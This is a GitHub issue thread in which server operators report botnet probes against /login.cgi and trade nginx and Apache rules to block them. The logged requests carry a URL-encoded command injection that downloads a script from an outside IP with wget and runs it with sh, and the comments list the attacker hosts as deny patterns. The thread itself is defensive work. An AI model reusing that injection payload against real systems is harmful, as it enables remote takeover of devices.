### ISSUE TITLE
new script detected and it doesn't look friendly

### ISSUE THREAD

**Issue by i300220** [mitchellkrogza/nginx-ultimate-bad-bot-blocker#185]
UA:  "Hello, World"

My reaction was to ban the IP range for 185.62.190.191

Some examples from today (started the day before actually) thanks to your UA emailing cron job ;)

`
151.84.91.162 - - [17/Jun/2018:08:02:51 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
73.150.200.66 - - [17/Jun/2018:08:29:56 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
185.43.149.23 - - [17/Jun/2018:09:43:50 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
186.182.245.162 - - [17/Jun/2018:11:28:34 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
121.65.44.69 - - [17/Jun/2018:11:39:29 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
151.48.117.145 - - [17/Jun/2018:11:45:42 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
93.174.36.242 - - [17/Jun/2018:13:07:54 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
190.215.241.241 - - [17/Jun/2018:14:10:08 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
71.208.13.78 - - [17/Jun/2018:14:38:19 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
24.187.38.52 - - [17/Jun/2018:15:29:48 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
171.235.115.70 - - [17/Jun/2018:16:05:29 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
177.140.25.89 - - [17/Jun/2018:17:03:17 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
113.186.152.120 - - [17/Jun/2018:17:26:38 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
100.37.40.180 - - [17/Jun/2018:17:52:00 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
112.222.133.110 - - [17/Jun/2018:19:03:09 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
92.87.53.125 - - [17/Jun/2018:19:06:33 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 403 135 "-" "Hello, World"
78.189.51.245 - - [17/Jun/2018:19:07:26 -0700] "HEAD / HTTP/1.0" 301 0 "-" "Hello, World"
`

**Comment by mitchellkrogza** [comment]
Thanks for reporting, as it changes IP all the time the only way to successfully block it would be to scan for the user agent "Hello, World" but they could easily change that too. Will have to look into this more

**Comment by johnno56** [comment]
best way i found to block them is by query_string as they also change the user agent
RewriteCond %{QUERY_STRING} http://hakaiboatnet\.pw [NC,OR]
RewriteCond %{QUERY_STRING} 185\.62\.190\.191 [NC,OR]
RewriteCond %{QUERY_STRING} 178\.128\.11\.199 [NC,OR]
RewriteCond %{QUERY_STRING} 199\.195\.254\.118 [NC]
RewriteRule (.*) - [F,L]

**Comment by mitchellkrogza** [comment]
Best way to deal with these attacks like these is to add this block to your hosts.

```
# Protect Perl/CGI/etc files
location ~* \.(pl|cgi|py|sh|lua)\$ 
{
        return 444;
}
``` 

I have a very solid wprestrict.conf file which gets included into all hosts, I will share it here on the repo soon.


Going to close this now.
